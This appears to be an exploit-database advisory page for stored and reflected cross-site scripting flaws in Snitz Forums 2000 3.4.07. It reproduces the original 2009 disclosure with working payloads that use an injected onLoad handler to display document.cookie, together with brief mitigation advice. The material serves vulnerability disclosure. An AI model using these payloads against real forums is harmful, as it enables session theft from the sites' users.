Multiple Cross-Site Scripting

vendor:

Snitz Forums 2000

by:

Andrea Fabrizi

8.8

CVSS

HIGH

Cross-Site Scripting

CWE

Product Name: Snitz Forums 2000

Affected Version From: 3.4.07

Affected Version To: 3.4.07

Patch Exists: YES

Related CWE: N/A

CPE: a:snitz_forums:snitz_forums_2000

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Multiple Cross-Site Scripting

If [sound] tag is allowed, an attacker can inject malicious JavaScript code in the form of [sound]http://url_to_valid_mp3_or_m3u_file.m3u"; onLoad="alert(document.cookie)[/sound]. Similarly, an attacker can inject malicious JavaScript code in the form of http://localhost/forum/pop_send_to_friend.asp?url=</textarea><img src="http://exploit.company/wp-content/uploads/2023/09/logo.gif"; onLoad="alert(document.cookie)">, where the space is important as it should be onLoad<space>="alert(document.cookie)".

Mitigation:

Input validation should be used to detect and reject malicious input. Sanitization should be used to prevent malicious input from being executed.

Source

Exploit-DB raw data:

**************************************************************
Application: Snitz Forums 2000
Version affected:  3.4.07
Website: http://forum.snitz.com/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi () gmail com
Web: http://www.andreafabrizi.it
Vuln: Multiple Cross-Site Scripting
**************************************************************

###### PERMANENT XSS
If [sound] tag is allowed:

[sound]http://url_to_valid_mp3_or_m3u_file.m3u";
onLoad="alert(document.cookie)[/sound]
######

###### LINK XSS
http://localhost/forum/pop_send_to_friend.asp?url=&lt;/textarea&gt;<img
src="http://www.google.it/intl/it_it/images/logo.gif"; onLoad
="alert(document.cookie)">

Note the space: onLoad<space>="alert(document.cookie)"
######